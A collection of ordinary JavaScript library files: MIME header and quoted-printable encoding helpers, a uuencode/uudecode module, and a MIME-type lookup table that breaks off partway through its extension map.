    },

    decodeBase64: function(str, toCharset, fromCharset) {
        var buffer = new Buffer((str || "").toString(), "base64");
        return convert(buffer, toCharset, fromCharset);
    },

    decodeQuotedPrintable: function(str, toCharset, fromCharset) {
        str = (str || "").toString();
        str = str.replace(/\=(?:\r?\n|$)/g, "");
        return this.mimeDecode(str, toCharset, fromCharset);
    },

    encodeQuotedPrintable: function(str, toCharset, fromCharset) {
        var mimeEncodedStr = this.mimeEncode(str, toCharset, fromCharset);

        
        mimeEncodedStr = mimeEncodedStr.replace(/\r?\n|\r/g, function() {
            return "\r\n";
        }).replace(/[\t ]+$/gm, function(spaces) {
            return spaces.replace(/ /g, "=20").replace(/\t/g, "=09");
        });

        return addSoftLinebreaks(mimeEncodedStr, "qp");
    },

    encodeMimeWord: function(str, encoding, maxLength, toCharset, fromCharset) {
        toCharset = (toCharset || "utf-8").toString().toUpperCase().trim();
        encoding = (encoding || "Q").toString().toUpperCase().trim().charAt(0);
        var encodedStr;

        if (maxLength && maxLength > 7 + toCharset.length) {
            maxLength -= (7 + toCharset.length);
        }

        if (encoding == "Q") {
            encodedStr = this.mimeEncode(str, toCharset, fromCharset);
            encodedStr = encodedStr.replace(/[\r\n\t_]/g, function(chr) {
                var code = chr.charCodeAt(0);
                return "=" + (code < 0x10 ? "0" : "") + code.toString(16).toUpperCase();
            }).replace(/\s/g, "_");
        } else if (encoding == "B") {
            encodedStr = convert(str || "", toCharset, fromCharset).toString("base64").trim();
        }

        if (maxLength && encodedStr.length > maxLength) {
            if (encoding == "Q") {
                encodedStr = this.splitEncodedString(encodedStr, maxLength).join("?= =?" + toCharset + "?" + encoding + "?");
            } else {
                encodedStr = encodedStr.replace(new RegExp(".{" + maxLength + "}", "g"), "$&?= =?" + toCharset + "?" + encoding + "?");
                if (encodedStr.substr(-(" =?" + toCharset + "?" + encoding + "?=").length) == " =?" + toCharset + "?" + encoding + "?=") {
                    encodedStr = encodedStr.substr(0, encodedStr.length - (" =?" + toCharset + "?" + encoding + "?=").length);
                }
                if (encodedStr.substr(-(" =?" + toCharset + "?" + encoding + "?").length) == " =?" + toCharset + "?" + encoding + "?") {
                    encodedStr = encodedStr.substr(0, encodedStr.length - (" =?" + toCharset + "?" + encoding + "?").length);
                }
            }
        }

        return "=?" + toCharset + "?" + encoding + "?" + encodedStr + (encodedStr.substr(-2) == "?=" ? "" : "?=");
    },

    decodeMimeWord: function(str, toCharset) {
        str = (str || "").toString().trim();

        var fromCharset, encoding, match;

        match = str.match(/^\=\?([\w_\-]+)\?([QqBb])\?([^\?]*)\?\=$/i);
        if (!match) {
            return convert(str, toCharset);
        }

        fromCharset = match[1];
        encoding = (match[2] || "Q").toString().toUpperCase();
        str = (match[3] || "").replace(/_/g, " ");

        if (encoding == "B") {
            return this.decodeBase64(str, toCharset, fromCharset);
        } else if (encoding == "Q") {
            return this.mimeDecode(str, toCharset, fromCharset);
        } else {
            return str;
        }


    },

    decodeMimeWords: function(str, toCharset) {
        var curCharset;

        str = (str || "").toString().
        replace(/(=\?[^?]+\?[QqBb]\?[^?]+\?=)\s+(?==\?[^?]+\?[QqBb]\?[^?]*\?=)/g, "$1").
        replace(/\=\?([\w_\-]+)\?([QqBb])\?[^\?]*\?\=/g, (function(mimeWord, charset, encoding) {
            curCharset = charset + encoding;
            return this.decodeMimeWord(mimeWord);
        }).bind(this));

        return convert(str, toCharset);
    },

    foldLine: function(str, lineLengthMax, afterSpace, lineMargin) {
        lineLengthMax = lineLengthMax || 76;
        lineMargin = lineMargin || Math.floor(lineLengthMax / 5);
        str = (str || "").toString().trim();

        var pos = 0,
            len = str.length,
            result = "",
            line, match;

        while (pos < len) {
            line = str.substr(pos, lineLengthMax);
            if (line.length < lineLengthMax) {
                result += line;
                break;
            }
            if ((match = line.match(/^[^\n\r]*(\r?\n|\r)/))) {
                line = match[0];
                result += line;
                pos += line.length;
                continue;
            } else if ((match = line.substr(-lineMargin).match(/(\s+)[^\s]*$/))) {
                line = line.substr(0, line.length - (match[0].length - ( !! afterSpace ? (match[1] || "").length : 0)));
            } else if ((match = str.substr(pos + line.length).match(/^[^\s]+(\s*)/))) {
                line = line + match[0].substr(0, match[0].length - (!afterSpace ? (match[1] || "").length : 0));
            }
            result += line;
            pos += line.length;
            if (pos < len) {
                result += "\r\n";
            }
        }

        return result;
    },

    encodeMimeWords: function(value, encoding, maxLength, toCharset, fromCharset) {
        var decodedValue = convert((value || ""), "utf-8", fromCharset).toString("utf-8"),
            encodedValue;

        encodedValue = decodedValue.replace(/([^\s\u0080-\uFFFF]*[\u0080-\uFFFF]+[^\s\u0080-\uFFFF]*(?:\s+[^\s\u0080-\uFFFF]*[\u0080-\uFFFF]+[^\s\u0080-\uFFFF]*\s*)?)+(?=\s|$)/g, (function(str) {
            return str.length ? this.encodeMimeWord(str, encoding || "Q", maxLength, toCharset) : "";
        }).bind(this));

        return encodedValue;
    },

    encodeHeaderLine: function(key, value, toCharset, fromCharset) {
        var encodedValue = this.encodeMimeWords(value, 52, toCharset, fromCharset);
        return this.foldLine(key + ": " + encodedValue, 76);
    },

    parseHeaderLines: function(headers, toCharset) {
        var lines = headers.split(/\r?\n|\r/),
            headersObj = {},
            key, value,
            header,
            i, len;

        for (i = lines.length - 1; i >= 0; i--) {
            if (i && lines[i].match(/^\s/)) {
                lines[i - 1] += "\r\n" + lines[i];
                lines.splice(i, 1);
            }
        }

        for (i = 0, len = lines.length; i < len; i++) {
            header = this.decodeHeaderLine(lines[i]);
            key = (header[0] || "").toString().toLowerCase().trim();
            value = header[1] || "";
            if (!toCharset || (toCharset || "").toString().trim().match(/^utf[\-_]?8$/i)) {
                value = value.toString("utf-8");
            }
            if (!headersObj[key]) {
                headersObj[key] = [value];
            } else {
                headersObj[key].push(value);
            }
        }

        return headersObj;
    },

    decodeHeaderLine: function(header, toCharset) {
        var line = (header || "").toString().replace(/(?:\r?\n|\r)[ \t]*/g, " ").trim(),
            match = line.match(/^\s*([^:]+):(.*)$/),
            key = (match && match[1] || "").trim(),
            value = (match && match[2] || "").trim();

        value = this.decodeMimeWords(value, toCharset);
        return [key, value];
    },

    splitEncodedString: function(str, maxlen) {
        var curLine, match, chr, done,
            lines = [];

        while (str.length) {
            curLine = str.substr(0, maxlen);

            // move incomplete escaped char back to main
            if ((match = curLine.match(/\=[0-9A-F]?$/i))) {
                curLine = curLine.substr(0, match.index);
            }

            done = false;
            while (!done) {
                done = true;
                // check if not middle of a unicode char sequence
                if ((match = str.substr(curLine.length).match(/^\=([0-9A-F]{2})/i))) {
                    chr = parseInt(match[1], 16);
                    // invalid sequence, move one char back anc recheck
                    if (chr < 0xC2 && chr > 0x7F) {
                        curLine = curLine.substr(0, curLine.length - 3);
                        done = false;
                    }
                }
            }

            if (curLine.length) {
                lines.push(curLine);
            }
            str = str.substr(curLine.length);
        }

        return lines;
    },

    parseAddresses: addressparser

};

// Lines can't be longer that 76 + <CR><LF> = 78 bytes
// http://tools.ietf.org/html/rfc2045#section-6.7
function addSoftLinebreaks(str, encoding) {
    var lineLengthMax = 76;

    encoding = (encoding || "base64").toString().toLowerCase().trim();

    if (encoding == "qp") {
        return addQPSoftLinebreaks(str, lineLengthMax);
    } else {
        return addBase64SoftLinebreaks(str, lineLengthMax);
    }
}

function addBase64SoftLinebreaks(base64EncodedStr, lineLengthMax) {
    base64EncodedStr = (base64EncodedStr || "").toString().trim();
    return base64EncodedStr.replace(new RegExp(".{" + lineLengthMax + "}", "g"), "$&\r\n").trim();
}

function addQPSoftLinebreaks(mimeEncodedStr, lineLengthMax) {
    var pos = 0,
        len = mimeEncodedStr.length,
        match, code, line,
        lineMargin = Math.floor(lineLengthMax / 3),
        result = "";

    
    while (pos < len) {
        line = mimeEncodedStr.substr(pos, lineLengthMax);
        if ((match = line.match(/\r\n/))) {
            line = line.substr(0, match.index + match[0].length);
            result += line;
            pos += line.length;
            continue;
        }

        if (line.substr(-1) == "\n") {
            
            result += line;
            pos += line.length;
            continue;
        } else if ((match = line.substr(-lineMargin).match(/\n.*?$/))) {
            
            line = line.substr(0, line.length - (match[0].length - 1));
            result += line;
            pos += line.length;
            continue;
        } else if (line.length > lineLengthMax - lineMargin && (match = line.substr(-lineMargin).match(/[ \t\.,!\?][^ \t\.,!\?]*$/))) {
            
            line = line.substr(0, line.length - (match[0].length - 1));
        } else if (line.substr(-1) == "\r") {
            line = line.substr(0, line.length - 1);
        } else {
            if (line.match(/\=[\da-f]{0,2}$/i)) {

                
                if ((match = line.match(/\=[\da-f]{0,1}$/i))) {
                    line = line.substr(0, line.length - match[0].length);
                }

                
                while (line.length > 3 && line.length < len - pos && !line.match(/^(?:=[\da-f]{2}){1,4}$/i) && (match = line.match(/\=[\da-f]{2}$/ig))) {
                    code = parseInt(match[0].substr(1, 2), 16);
                    if (code < 128) {
                        break;
                    }

                    line = line.substr(0, line.length - 3);

                    if (code >= 0xC0) {
                        break;
                    }
                }

            }
        }

        if (pos + line.length < len && line.substr(-1) != "\n") {
            if (line.length == 76 && line.match(/\=[\da-f]{2}$/i)) {
                line = line.substr(0, line.length - 3);
            } else if (line.length == 76) {
                line = line.substr(0, line.length - 1);
            }
            pos += line.length;
            line += "=\r\n";
        } else {
            pos += line.length;
        }

        result += line;
    }

    return result;
}

function checkRanges(nr, ranges) {
    for (var i = ranges.length - 1; i >= 0; i--) {
        if (!ranges[i].length) {
            continue;
        }
        if (ranges[i].length == 1 && nr == ranges[i][0]) {
            return true;
        }
        if (ranges[i].length == 2 && nr >= ranges[i][0] && nr <= ranges[i][1]) {
            return true;
        }
    }
    return false;
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               

========

var fs = require('fs');
var path = require('path');

var hasOwn = Object.prototype.hasOwnProperty;
var toStr = Object.prototype.toString;

var isArray = function isArray(arr) {
   if (typeof Array.isArray === 'function') {
      return Array.isArray(arr);
   }

   return toStr.call(arr) === '[object Array]';
};

var isPlainObject = function isPlainObject(obj) {
   if (!obj || toStr.call(obj) !== '[object Object]') {
      return false;
   }

   var hasOwnConstructor = hasOwn.call(obj, 'constructor');
   var hasIsPrototypeOf = obj.constructor && obj.constructor.prototype && hasOwn.call(obj.constructor.prototype, 'isPrototypeOf');
   
   if (obj.constructor && !hasOwnConstructor && !hasIsPrototypeOf) {
      return false;
   }

   
   
   var key;
   for (key in obj) {}

   return typeof key === 'undefined' || hasOwn.call(obj, key);
};

function extend() {
   var options, name, src, copy, copyIsArray, clone,
      target = arguments[0],
      i = 1,
      length = arguments.length,
      deep = false;

   
   if (typeof target === 'boolean') {
      deep = target;
      target = arguments[1] || {};
      
      i = 2;
   } else if ((typeof target !== 'object' && typeof target !== 'function') || target == null) {
      target = {};
   }

   for (; i < length; ++i) {
      options = arguments[i];
      
      if (options != null) {
         
         for (name in options) {
            src = target[name];
            copy = options[name];

            
            if (target !== copy) {
               
               if (deep && copy && (isPlainObject(copy) || (copyIsArray = isArray(copy)))) {
                  if (copyIsArray) {
                     copyIsArray = false;
                     clone = src && isArray(src) ? src : [];
                  } else {
                     clone = src && isPlainObject(src) ? src : {};
                  }

                  
                  target[name] = extend(deep, clone, copy);

               
               } else if (typeof copy !== 'undefined') {
                  target[name] = copy;
               }
            }
         }
      }
   }

   
   return target;
};
 

var UUE = function(){
   if (!(this instanceof UUE)) return new UUE();
};

UUE.prototype.encode = function(encodeSource, encodeOptions){
   
   var options = extend(
      {},
      { mode: null, filename: null, eol: null },
      encodeOptions
   );

   if( typeof encodeSource === 'string' ){ 
      
      if( options.mode === null ){
         options.mode = (
            fs.statSync(encodeSource).mode & parseInt('777', 8)
         ).toString(8);
      } else if( typeof options.mode !== 'string' ){
         options.mode = options.mode.toString(8);
      }

      
      if( options.filename === null ){
         options.filename = path.basename(encodeSource);
      }

      
      encodeSource = fs.readFileSync(encodeSource);
   } else if( Buffer.isBuffer(encodeSource) ){ 
      
      if( options.mode === null ){
         options.mode = '644';
      } else if( typeof options.mode !== 'string' ){
         options.mode = options.mode.toString(8);
      }

      
      if( options.filename === null ) options.filename = 'buffer.bin';
   } else throw new Error(this.errors.UNKNOWN_SOURCE_TYPE);

   if( options.eol === null ) options.eol = '\n';

   
   var output = [];
   output.push('begin ');
   output.push(options.mode);
   output.push(' ');
   output.push(options.filename);
   output.push(options.eol);

   var offset = 0;
   while( offset < encodeSource.length ){
      var triplet, total, charCode;
      if( encodeSource.length - offset >= 45 ){ 
         output.push(String.fromCharCode(45 + 32));
         for( triplet = 0; triplet < 15; triplet++ ){
            total = 0;

            total += encodeSource.readUInt8(offset) << 16;
            offset++;
            total += encodeSource.readUInt8(offset) << 8;
            offset++;
            total += encodeSource.readUInt8(offset);
            offset++;

            charCode = total >>> 18;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));

            charCode = (total >>> 12) & 0x3F;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));

            charCode = (total >>> 6) & 0x3F;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));

            charCode = total & 0x3F;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));
         }
      } else { 
         output.push(String.fromCharCode(encodeSource.length - offset + 32));
         var tripletNum = ( (encodeSource.length - offset) /3 ) |0;
         for( triplet = 0; triplet < tripletNum; triplet++ ){
            total = 0;

            total += encodeSource.readUInt8(offset) << 16;
            offset++;
            total += encodeSource.readUInt8(offset) << 8;
            offset++;
            total += encodeSource.readUInt8(offset);
            offset++;

            charCode = total >>> 18;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));

            charCode = (total >>> 12) & 0x3F;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));

            charCode = (total >>> 6) & 0x3F;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));

            charCode = total & 0x3F;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));
         }
         if( offset < encodeSource.length ){ // some bytes remain
            total = 0;

            total += encodeSource.readUInt8(offset) << 16;
            offset++;
            if( offset < encodeSource.length ){
               total += encodeSource.readUInt8(offset) << 8;
               offset++;
            }
            if( offset < encodeSource.length ){
               total += encodeSource.readUInt8(offset);
               offset++;
            }

            charCode = total >>> 18;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));

            charCode = (total >>> 12) & 0x3F;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));

            charCode = (total >>> 6) & 0x3F;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));

            charCode = total & 0x3F;
            if( charCode === 0 ) charCode = 64;
            output.push(String.fromCharCode(charCode + 32));
         }
      }
      output.push(options.eol);
   }

   output.push('`');
   output.push(options.eol);
   output.push('end');
   return output.join('');
};

UUE.prototype.decodeFile = function(text, filename){
   var matches = [];
   var potentialUUE = RegExp(
      [
         '^begin [0-7]{3} ' + filename + '\n',
         '(',
         '(?:[\x20-\x60]+\n)*', // allow garbage after significant characters
         ')',
         '(?:`| )\n',
         'end$'
      ].join(''),
      'gm'
   );

   var continueSearch = true;
   do {
      var nextMatch = potentialUUE.exec(text);
      if( nextMatch === null ){
         continueSearch = false;
      } else {
         matches.push(nextMatch);
      }
   } while( continueSearch );

   if( matches.length === 0 ) return null;

   var fileFound = null;
   matches.forEach(function(nextMatch){
      if( fileFound !== null ) return;

      if( nextMatch[1].length < 1 ){
         fileFound = new Buffer(0);
         return;
      }

      var decodingError = false;
      var decoded = nextMatch[1].split('\n');
      decoded.pop(); // cut last \n (it is not a separator)
      decoded = decoded.map(function(lineUUE){
         /* jshint bitwise:false */
         if( decodingError ) return null;

         var byteLength = (lineUUE.charCodeAt(0) - 32) % 64;
         if( byteLength === 0 ) return new Buffer(0);

         var charLength = ( (byteLength / 3) |0 ) * 4;
         if( byteLength % 3 !== 0 ) charLength += 4;
         if( 1 + charLength > lineUUE.length ){
            decodingError = true;
            return null;
         }
         var targetBuffer = new Buffer(byteLength);

         var step, total;
         var stringOffset = 1;
         var bufferOffset = 0;
         for( step = 0; step < ( (charLength / 4) |0 ); step++ ){
            total = 0;

            total += ((lineUUE.charCodeAt(stringOffset) - 32) % 64) << 18;
            stringOffset++;
            total += ((lineUUE.charCodeAt(stringOffset) - 32) % 64) << 12;
            stringOffset++;
            total += ((lineUUE.charCodeAt(stringOffset) - 32) % 64) << 6;
            stringOffset++;
            total +=  (lineUUE.charCodeAt(stringOffset) - 32) % 64;
            stringOffset++;

            // noAssert === true:
            // silently apply &0xFF mask, silently drop after byteLength
            targetBuffer.writeUInt8( total >>> 16, bufferOffset, true );
            bufferOffset++;
            targetBuffer.writeUInt8( total >>> 8, bufferOffset, true );
            bufferOffset++;
            targetBuffer.writeUInt8( total, bufferOffset, true );
            bufferOffset++;
         }
         return targetBuffer;
      });
      if( decodingError ) return;

      // now `decoded` is a valid array containing buffers,
      // because `null` could appear only in `decodingError` state
      fileFound = Buffer.concat(decoded);
   });

   return fileFound;
};

UUE.prototype.decodeAllFiles = function(text){
   var allFiles = [];
   var matches = [];
   var potentialUUE = RegExp(
      [ // detail-capturing version of the RegExp from `.split`
         '^begin [0-7]{3} (\\S+?)\n',
         '(',
         '(?:[\x20-\x60]+\n)*', // allow garbage after significant characters
         ')',
         '(?:`| )\n',
         'end$'
      ].join(''),
      'gm'
   );

   var continueSearch = true;
   do {
      var nextMatch = potentialUUE.exec(text);
      if( nextMatch === null ){
         continueSearch = false;
      } else {
         matches.push(nextMatch);
      }
   } while( continueSearch );

   if( matches.length === 0 ) return [];

   matches.forEach(function(nextMatch){
      var nextFilename = nextMatch[1];
      var idxFilename = allFiles.findIndex(function(nextFile){
         return nextFile.name === nextFilename;
      });
      if( idxFilename > -1 ) return; // already found, skip it

      if( nextMatch[2].length < 1 ){
         allFiles.push({
            name: nextFilename,
            data: new Buffer(0)
         });
         return;
      }

      var decodingError = false;
      var decoded = nextMatch[2].split('\n');
      decoded.pop(); // cut last \n (it is not a separator)
      decoded = decoded.map(function(lineUUE){
         /* jshint bitwise:false */
         if( decodingError ) return null;

         var byteLength = (lineUUE.charCodeAt(0) - 32) % 64;
         if( byteLength === 0 ) return new Buffer(0);

         var charLength = ( (byteLength / 3) |0 ) * 4;
         if( byteLength % 3 !== 0 ) charLength += 4;
         if( 1 + charLength > lineUUE.length ){
            decodingError = true;
            return null;
         }
         var targetBuffer = new Buffer(byteLength);

         var step, total;
         var stringOffset = 1;
         var bufferOffset = 0;
         for( step = 0; step < ( (charLength / 4) |0 ); step++ ){
            total = 0;

            total += ((lineUUE.charCodeAt(stringOffset) - 32) % 64) << 18;
            stringOffset++;
            total += ((lineUUE.charCodeAt(stringOffset) - 32) % 64) << 12;
            stringOffset++;
            total += ((lineUUE.charCodeAt(stringOffset) - 32) % 64) << 6;
            stringOffset++;
            total +=  (lineUUE.charCodeAt(stringOffset) - 32) % 64;
            stringOffset++;

            // noAssert === true:
            // silently apply &0xFF mask, silently drop after byteLength
            targetBuffer.writeUInt8( total >>> 16, bufferOffset, true );
            bufferOffset++;
            targetBuffer.writeUInt8( total >>> 8, bufferOffset, true );
            bufferOffset++;
            targetBuffer.writeUInt8( total, bufferOffset, true );
            bufferOffset++;
         }
         return targetBuffer;
      });
      if( decodingError ) return;

      // now `decoded` is a valid array containing buffers,
      // because `null` could appear only in `decodingError` state
      allFiles.push({
         name: nextFilename,
         data: Buffer.concat(decoded)
      });
   });

   return allFiles;
};

UUE.prototype.split = function(text){
   var processUUE = this;
   var potentialUUE = RegExp(
      [ // entirely-capturing version of the RegExp from `.decodeAllFiles`
         '(',
         '^begin [0-7]{3} \\S+?\n',
         '(?:[\x20-\x60]+\n)*', // allow garbage after significant characters
         '(?:`| )\n',
         'end$',
         ')'
      ].join(''),
      'gm'
   );
   return text.split(potentialUUE).map(function(fragment, idx, arr){
      /* jshint indent: false */
      if( idx % 2 === 0 ){ // simple string fragment's index: 0, 2, 4...
         return fragment;
      } else { // regex-captured fragment's index: 1, 3, 5...
         var decodedFiles = processUUE.decodeAllFiles(fragment);
         switch( decodedFiles.length ){
            case 0:
               // incorrect UUE, append to the previous (always text) fragment
               arr[idx-1] += fragment;
               return null;
            //break;
            case 1:
               // correct UUE
               decodedFiles[0].source = fragment;
               decodedFiles[0].type = 'UUE';
               return decodedFiles[0];
            //break;
            default: throw new Error(
               processUUE.errors.UNEXPECTED_NUMBER_OF_FILES
            );
         }
      }
   }).filter(function(nextElement){
      if( nextElement === '' ) return false;
      if( nextElement === null ) return false;

      return true;
   }).reduce(function(builtArray, nextFragment){
      if( typeof nextFragment !== 'string' ){
         builtArray.push(nextFragment);
      } else { // typeof nextFragment === 'string'
         if(
            builtArray.length > 0 &&
            typeof builtArray[builtArray.length - 1] === 'string'
         ){ // the array's last element is also a string; appending:
            builtArray[builtArray.length - 1] += nextFragment;
         } else {
            builtArray.push(nextFragment);
         }
      }
      return builtArray;
   }, []);
};

UUE.prototype.errors = {
   UNKNOWN_SOURCE_TYPE: "The source's type is unknown!",
   UNEXPECTED_NUMBER_OF_FILES: "Unexpected number of files in a fragment!"
};

module.exports = new UUE();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       

========

function Mime() {
  
  this.types = Object.create(null);

  
  this.extensions = Object.create(null);
}


Mime.prototype.define = function (map) {
  for (var type in map) {
    var exts = map[type];
    for (var i = 0; i < exts.length; i++) {
      if (process.env.DEBUG_MIME && this.types[exts]) {
        console.warn(this._loading.replace(/.*\//, ''), 'changes "' + exts[i] + '" extension type from ' +
          this.types[exts] + ' to ' + type);
      }

      this.types[exts[i]] = type;
    }

    
    if (!this.extensions[type]) {
      this.extensions[type] = exts[0];
    }
  }
};


Mime.prototype.lookup = function(path, fallback) {
  var ext = path.replace(/.*[\.\/\\]/, '').toLowerCase();

  return this.types[ext] || fallback || this.default_type;
};


Mime.prototype.extension = function(mimeType) {
  var type = mimeType.match(/^\s*([^;\s]*)(?:;|\s|$)/)[1].toLowerCase();
  return this.extensions[type];
};


var mime = new Mime();


mime.define({ "application/andrew-inset": ["ez"], "application/applixware": ["aw"], "application/atom+xml": ["atom"], "application/atomcat+xml": ["atomcat"], "application/atomsvc+xml": ["atomsvc"], "application/ccxml+xml": ["ccxml"], "application/cdmi-capability": ["cdmia"], "application/cdmi-container": ["cdmic"], "application/cdmi-domain": ["cdmid"], "application/cdmi-object": ["cdmio"], "application/cdmi-queue": ["cdmiq"], "application/cu-seeme": ["cu"], "application/dash+xml": ["mdp"], "application/davmount+xml": ["davmount"], "application/docbook+xml": ["dbk"], "application/dssc+der": ["dssc"], "application/dssc+xml": ["xdssc"], "application/ecmascript": ["ecma"], "application/emma+xml": ["emma"], "application/epub+zip": ["epub"], "application/exi": ["exi"], "application/font-tdpfr": ["pfr"], "application/font-woff": ["woff"], "application/font-woff2": ["woff2"], "application/gml+xml": ["gml"], "application/gpx+xml": ["gpx"], "application/gxf": ["gxf"], "application/hyperstudio": ["stk"], "application/inkml+xml": ["ink", "inkml"], "application/ipfix": ["ipfix"], "application/java-archive": ["jar"], "application/java-serialized-object": ["ser"], "application/java-vm": ["class"], "application/javascript": ["js"], "application/json": ["json", "map"], "application/json5": ["json5"], "application/jsonml+json": ["jsonml"], "application/lost+xml": ["lostxml"], "application/mac-binhex40": ["hqx"], "application/mac-compactpro": ["cpt"], "application/mads+xml": ["mads"], "application/marc": ["mrc"], "application/marcxml+xml": ["mrcx"], "application/mathematica": ["ma", "nb", "mb"], "application/mathml+xml": ["mathml"], "application/mbox": ["mbox"], "application/mediaservercontrol+xml": ["mscml"], "application/metalink+xml": ["metalink"], "application/metalink4+xml": ["meta4"], "application/mets+xml": ["mets"], "application/mods+xml": ["mods"], "application/mp21": ["m21", "mp21"], "application/mp4": ["mp4s", "m4p"], "application/msword": ["doc", "dot"], "application/mxf": ["mxf"], "application/octet-stream": ["bin", "dms", "lrf", "mar", "so", "dist", "distz", "pkg", "bpk", "dump", "elc", "deploy", "buffer"], "application/oda": ["oda"], "application/oebps-package+xml": ["opf"], "application/ogg": ["ogx"], "application/omdoc+xml": ["omdoc"], "application/onenote": ["onetoc", "onetoc2", "onetmp", "onepkg"], "application/oxps": ["oxps"], "application/patch-ops-error+xml": ["xer"], "application/pdf": ["pdf"], "application/pgp-encrypted": ["pgp"], "application/pgp-signature": ["asc", "sig"], "application/pics-rules": ["prf"], "application/pkcs10": ["p10"], "application/pkcs7-mime": ["p7m", "p7c"], "application/pkcs7-signature": ["p7s"], "application/pkcs8": ["p8"], "application/pkix-attr-cert": ["ac"], "application/pkix-cert": ["cer"], "application/pkix-crl": ["crl"], "application/pkix-pkipath": ["pkipath"], "application/pkixcmp": ["pki"], "application/pls+xml": ["pls"], "application/postscript": ["ai", "eps", "ps"], "application/prs.cww": ["cww"], "application/pskc+xml": ["pskcxml"], "application/rdf+xml": ["rdf"], "application/reginfo+xml": ["rif"], "application/relax-ng-compact-syntax": ["rnc"], "application/resource-lists+xml": ["rl"], "application/resource-lists-diff+xml": ["rld"], "application/rls-services+xml": ["rs"], "application/rpki-ghostbusters": ["gbr"], "application/rpki-manifest": ["mft"], "application/rpki-roa": ["roa"], "application/rsd+xml": ["rsd"], "application/rss+xml": ["rss"], "application/rtf": ["rtf"], "application/sbml+xml": ["sbml"], "application/scvp-cv-request": ["scq"], "application/scvp-cv-response": ["scs"], "application/scvp-vp-request": ["spq"], "application/scvp-vp-response": ["spp"], "application/sdp": ["sdp"], "application/set-payment-initiation": ["setpay"], "application/set-registration-initiation": ["setreg"], "application/shf+xml": ["shf"], "application/smil+xml": ["smi", "smil"], "application/sparql-query": ["rq"], "application/sparql-results+xml": ["srx"], "application/srgs": ["gram"], "application/srgs+xml": ["grxml"], "application/sru+xml": ["sru"], "application/ssdl+xml": ["ssdl"], "application/ssml+xml": ["ssml"], "application/tei+xml": ["tei", "teicorpus"], "application/thraud+xml": ["tfi"], "application/timestamped-data": ["tsd"], "application/vnd.3gpp.pic-bw-large": ["plb"], "application/vnd.3gpp.pic-bw-small": ["psb"], "application/vnd.3gpp.pic-bw-var": ["pvb"], "application/vnd.3gpp2.tcap": ["tcap"], "application/vnd.3m.post-it-notes": ["pwn"], "application/vnd.accpac.simply.aso": ["aso"], "application/vnd.accpac.simply.imp": ["imp"], "application/vnd.acucobol": ["acu"], "application/vnd.acucorp": ["atc", "acutc"], "application/vnd.adobe.air-application-installer-package+zip": ["air"], "application/vnd.adobe.formscentral.fcdt": ["fcdt"], "application/vnd.adobe.fxp": ["fxp", "fxpl"], "application/vnd.adobe.xdp+xml": ["xdp"], "application/vnd.adobe.xfdf": ["xfdf"], "application/vnd.ahead.space": ["ahead"], "application/vnd.airzip.filesecure.azf": ["azf"], "application/vnd.airzip.filesecure.azs": ["azs"], "application/vnd.amazon.ebook": ["azw"], "application/vnd.americandynamics.acc": ["acc"], "application/vnd.amiga.ami": ["ami"], "application/vnd.android.package-archive": ["apk"], "application/vnd.anser-web-certificate-issue-initiation": ["cii"], "application/vnd.anser-web-funds-transfer-initiation": ["fti"], "application/vnd.antix.game-component": ["atx"], "application/vnd.apple.installer+xml": ["mpkg"], "application/vnd.apple.mpegurl": ["m3u8"], "application/vnd.aristanetworks.swi": ["swi"], "application/vnd.astraea-software.iota": ["iota"], "application/vnd.audiograph": ["aep"], "application/vnd.blueice.multipass": ["mpm"], "application/vnd.bmi": ["bmi"], "application/vnd.businessobjects": ["rep"], "application/vnd.chemdraw+xml": ["cdxml"], "application/vnd.chipnuts.karaoke-mmd": ["mmd"], "application/vnd.cinderella": ["cdy"], "application/vnd.claymore": ["cla"], "application/vnd.cloanto.rp9": ["rp9"], "application/vnd.clonk.c4group": ["c4g", "c4d", "c4f", "c4p", "c4u"], "application/vnd.cluetrust.cartomobile-config": ["c11amc"], "application/vnd.cluetrust.cartomobile-config-pkg": ["c11amz"], "application/vnd.commonspace": ["csp"], "application/vnd.contact.cmsg": ["cdbcmsg"], "application/vnd.cosmocaller": ["cmc"], "application/vnd.crick.clicker": ["clkx"], "application/vnd.crick.clicker.keyboard": ["clkk"], "application/vnd.crick.clicker.palette": ["clkp"], "application/vnd.crick.clicker.template": ["clkt"], "application/vnd.crick.clicker.wordbank": ["clkw"], "application/vnd.criticaltools.wbs+xml": ["wbs"], "application/vnd.ctc-posml": ["pml"], "application/vnd.cups-ppd": ["ppd"], "application/vnd.curl.car": ["car"], "application/vnd.curl.pcurl": ["pcurl"], "application/vnd.dart": ["dart"], "application/vnd.data-vision.rdz": ["rdz"], "application/vnd.dece.data": ["uvf", "uvvf", "uvd", "uvvd"], "application/vnd.dece.ttml+xml": ["uvt", "uvvt"], "application/vnd.dece.unspecified": ["uvx", "uvvx"], "application/vnd.dece.zip": ["uvz", "uvvz"], "application/vnd.denovo.fcselayout-link": ["fe_launch"], "application/vnd.dna": ["dna"], "application/vnd.dolby.mlp": ["mlp"], "application/vnd.dpgraph": ["dpg"], "application/vnd.dreamfactory": ["dfac"], "application/vnd.ds-keypoint": ["kpxx"], "application/vnd.dvb.ait": ["ait"], "application/vnd.dvb.service": ["svc"], "application/vnd.dynageo": ["geo"], "application/vnd.ecowin.chart": ["mag"], "application/vnd.enliven": ["nml"], "application/vnd.epson.esf": 